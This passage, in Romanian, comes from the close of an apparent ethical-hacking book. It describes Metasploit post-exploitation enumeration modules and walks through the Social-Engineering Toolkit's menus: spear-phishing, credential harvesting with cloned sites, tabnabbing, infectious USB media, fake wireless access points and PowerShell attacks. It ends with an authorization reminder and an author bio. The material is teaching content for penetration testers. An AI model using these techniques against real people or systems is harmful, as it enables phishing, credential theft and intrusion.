„enum_configs”, care va obține toate fișierele de configurare importante și
le va stoca în sistemul dumneavoastră.
Ar trebui să vedeți în rezultat un eșantion de fișiere de configurare care au fost
obținute de la sistemul de la distanță.
Dacă doriți să verificați unul dintre acele fișiere txt utilizând o aplicație de editare de text,
copiați unul dintre ele, deschideți o nouă consolă și utilizați instrumentul numit „nano
application” pentru a vedea conținutul acesteia.
Odată ce sunteți gata să mergeți mai departe, închideți această fereastră și reveniți la
fereastra principală. De data aceasta va trebui să enumerați configurațiile rețelei
cu modulul „enum_network”.
Comanda „enum_network” salvează tot ce ai găsit în
fișierele text, astfel încât să le poți verifica pentru a descoperi ce tipuri de instalări există pe
sistemul de la distanță, cum ar fi IDS, antivirus, IPS sau firewall-uri.
În continuare, poți folosi modulul „enum_protections”, dar poți și enumera
întregul sistem obținând informații referitoare la conturile de utilizator,
pachetele instalate, serviciile, hard disk-ul, versiunea Linux și așa mai departe.
Pentru a obține toate aceste informații, puteți utiliza comanda
„enum_system”
și puteți verifica conținutul fișierelor text generate. Pentru
a descoperi informații din istoricul utilizatorului, există
și un modul Metasploit care stochează aceste informații în sistemul dvs. local, numit
„enum_users_history”.
Capitolul 33 Setul de instrumente de inginerie socială
Ingineria socială este o tehnică importantă de care ar trebui să fiți conștienți
și, în scurt timp, veți înțelege cum folosesc hackerii
aplicațiile de inginerie socială pentru a păcăli victimele să execute capcana vulnerabilă. SET
sau Social-Engineering Toolkit este un cadru
open source bazat pe Python, care este conceput special pentru a facilita atacurile de inginerie
socială. Un avantaj semnificativ al setului de instrumente de inginerie socială este
interconectivitatea sa cu cadrul Metasploit, care oferă încărcăturile utile necesare exploatării,
criptarea pentru a ocoli antivirusul și modulul de ascultare care se conectează la sistemul
compromis atunci când trimite un shell înapoi la atacator. Pentru a porni setul de instrumente
de inginerie socială, tastați comanda „setoolkit” și apăsați Enter. Aveți mai multe opțiuni din
care să alegeți când se încarcă această aplicație. Primul este Atacuri de inginerie socială, care
oferă o combinație de metode de inginerie socială. Al doilea este Testarea de penetrare rapidă,
care oferă acces rapid la unele instrumente specializate. Puteți introduce numărul 2 pentru a
selecta această opțiune. În continuare, vi se vor prezenta opțiuni suplimentare. Primul
instrument este o spargere a parolelor bazelor de date SQL, al doilea sunt niște exploit-uri
personalizate care se bazează pe Python. După aceea, avem Enumerarea utilizatorilor și, în
sfârșit, conține injecția PSEXEC Powershell. Puteți introduce numărul 99 pentru a reveni la
meniul principal, dar dacă selectați prima opțiune care conține instrumente pentru atacuri de
inginerie socială, tot ce trebuie să faceți este să apăsați numărul 1 de pe tastatură. După ce ați
selectat această opțiune, veți avea din nou opțiuni suplimentare. Primul de pe listă este Spear-
Phishing Attack Vectors, care permite unui atacator să creeze mesaje de e-mail și să le trimită
victimelor vizate cu exploit-uri atașate. În continuare, avem site-ul Attack Vectors care
utilizează mai multe atacuri bazate pe web. Dacă selectați asta pentru a vedea detaliile,
apăsați pur și simplu numărul 2 de pe tastatură. După ce ați selectat această opțiune, vi se vor
prezenta din nou opțiuni suplimentare. Prima din listă numită Java Applet Attack Method care
falsifică un certificat Java și oferă o sarcină utilă bazată pe Metasploit. Acesta este cunoscut
drept unul dintre cele mai de succes atacuri și este eficient împotriva tuturor sistemelor, cum
ar fi ținte Windows, Linux sau OSX. Următoarea pe listă este numită Metoda de exploatare a
browserului Metasploit, care oferă o sarcină utilă Metasploit folosind un atac I-frame. În
continuare, pe listă avem ceea ce se numește metoda de atac Credential Harvester care
clonează un site web și rescrie automat post-parametrii pentru a permite atacatorului să
intercepteze și să colecteze acreditările utilizatorului. În continuare, pe lista noastră, avem
ceea ce se numește Metoda de atac Tabnabbing, care înlocuiește informațiile dintr-o filă de
browser inactivă cu o pagină clonată care trimite înapoi la atacator. După aceea, avem Metoda
de atac Web Jacking, care utilizează înlocuiri I-frame pentru a face ca linkul URL evidențiat să
pară legitim. Ultimul pe listă avem Metoda web Multi-Attack care permite unui atacator să
selecteze unele sau mai multe sau toate atacurile care pot fi lansate simultan. Dacă reveniți la
ecranul anterior și verificați restul atacurilor enumerate, Infectious Media Generator, de
exemplu, creează un fișier de rulare automată și o sarcină utilă Metasploit. Odată ce acesta
este copiat pe un dispozitiv USB și inserat în sistemul țintă, acesta va declanșa și rula automat
și va compromite sistemul. Apoi, va crea un modul Payload și Listener, care este o metodă
rapidă bazată pe meniu, creând o sarcină utilă Metasploit. După aceea, avem ceea ce se
numește Mass Mailer Attack, care permite atacatorului să trimită mai multe e-mailuri
personalizate la o singură adresă de e-mail sau o listă de mai multe adrese. În continuare,
avem Arduino-Based Attack Vector care programează dispozitive bazate pe Arduino. Deoarece
aceste dispozitive se înregistrează ca tastatură USB atunci când sunt conectate la un sistem
fizic Windows, ele pot ocoli securitatea pe baza dezactivării rulării automate sau a altei
securități ale punctelor finale. De exemplu, Wireless Access Point Attack Vector va crea un
punct de acces wireless fals și un server DHCP pe sistemul atacatorului și va redirecționa
toate interogările DNS către atacator. Hackerul poate lansa apoi diverse atacuri, cum ar fi
atacul Java Applet sau un atac Credential Harvester. QRCode Generator Attack Vector, de
exemplu, creează un cod QR cu o adresă URL definită asociată cu un atac. Powershell Attack
Vectors va permite atacatorului să creeze atacuri care se bazează pe Powershell, un shell de
linie de comandă și un limbaj de scripting disponibil pe toate sistemele, cum ar fi Windows,
Vista și versiuni superioare. În cele din urmă, avem module terțe care permit atacatorului să
folosească instrumentul de administrare la distanță ca parte a unui atac Java Applet sau ca
sarcină utilă izolată. Acest instrument este un instrument de acces de la distanță, condus de
meniu, text. Acoperirea tuturor acestor metode ar necesita o altă carte de la sine, dar după
cum vedeți, SET este foarte ușor de utilizat și aproape oricine îl poate folosi, deoarece tot ce
trebuie să faceți este să decideți ce atac doriți să implementați, apoi să apăsați numărul
asociat pe tastatură. . În cele din urmă, vă voi cere din nou să vă asigurați că aveți autorizație
scrisă pentru utilizarea SET într-un mediu live sau de producție. Dacă exersezi doar în
laboratorul tău de acasă, într-un mediu care nu este de producție, asta nu ar trebui să provoace
probleme nimănui; totuși, aș sugera să închideți routerul și să exersați cu grijă fără nicio
conexiune la internet. Concluzie Sper că această carte te-a ajutat să începi în căutarea ta de a
deveni Ethical Hacker sau Penetration Tester. Dacă ați descoperit că unele tehnici și strategii
sunt avansate, nu vă faceți griji, deoarece practica continuă vă va ajuta să deveniți un
profesionist IT mai bun în cel mai scurt timp. Vă mulțumim din nou pentru achiziționarea
acestei cărți. În cele din urmă, dacă ți-a plăcut conținutul, te rugăm să acorzi puțin timp pentru
a-ți împărtăși părerile și a posta o recenzie. Ar fi foarte apreciat! Despre autor Hugo, originar
din Austria, locuiește în prezent în Manchester, Marea Britanie. Hugo este specialist în
securitate IT, având peste 17 ani de experiență în domeniul IT. A început să lucreze la Service
Desk, apoi a trecut în domeniul Networking, unde a participat la diferite proiecte, inclusiv
Wireless Deployments, Wireless Security Design, Wired Network Security și Firewall Security. În
2015, din cauza creșterii atacurilor cibernetice, Departamentul de Securitate se extindea și a
început să recruteze membri suplimentari ai echipei. Acesta este momentul în care Hugo a
făcut din nou o schimbare și a început să lucreze ca analist de securitate IT. Din 2017, Hugo a
devenit Specialist în Securitate și a început să ofere servicii profesionale și să consulte diverse
Companii pentru a-și îmbunătăți securitatea.

S-ar putea să vă placă și